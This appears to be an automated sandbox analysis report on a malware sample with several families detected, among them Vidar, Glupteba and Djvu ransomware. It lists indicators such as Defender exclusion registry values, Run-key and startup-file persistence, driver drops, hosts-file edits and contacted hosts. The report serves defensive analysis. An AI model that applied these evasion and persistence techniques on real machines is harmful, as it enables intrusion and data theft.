Analysis Overview
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Detect Vidar Stealer
Glupteba
Vidar
Glupteba payload
Lumma Stealer
Socks5Systemz
DcRat
Djvu Ransomware
Detected Djvu ransomware
Detect Socks5Systemz Payload
SmokeLoader
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Modifies Windows Firewall
Creates new service(s)
Stops running service(s)
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Windows security modification
Modifies file permissions
Reads user/profile data of web browsers
Loads dropped DLL
Unexpected DNS network traffic destination
UPX packed file
Checks computer location settings
Reads data files stored by FTP clients
Executes dropped EXE
Drops startup file
Checks installed software on the system
Adds Run key to start application
Manipulates WinMonFS driver.
Manipulates WinMon driver.
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Creates a large amount of network flows
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Enumerates physical storage devices
Program crash
NSIS installer
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Modifies registry class
Suspicious use of FindShellTrayWindow
Runs ping.exe
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Creates scheduled task(s)
Enumerates processes with tasklist
Uses Task Scheduler COM API
Suspicious behavior: LoadsDriver
Modifies data under HKEY_USERS
GoLang User-Agent
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-10 16:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-10 16:21
Reported
2024-03-10 16:37
Platform
win7-20240221-en
Max time kernel
331s
Max time network
705s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\SystemCertificates\My | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socks5Systemz
Vidar
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5865l1C9DxinGCBdGI6B1MoP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFwUaZAUUG4Bz1JYIKNt5db6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QtGQLyuChGgsFZ31jtks8XvM.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rp0Gte16gcoJAEqdk4xsl0HN.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4nvAvIM2vYQKd9Cp7nQ9lAyZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h0iow1IYrorSkOj3adeAxdGj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 141.98.234.31 | N/A | N/A |
| Destination IP | 141.98.234.31 | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f55404de-f96d-40e3-8f6a-c259dbe6d608\\FE0F.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\FE0F.exe | N/A |
Checks installed software on the system
Creates a large amount of network flows
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240310162609.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8D34.exe |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\vgtejgi | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\vgtejgi | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\vgtejgi | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Windows\windefender.exe | N/A |
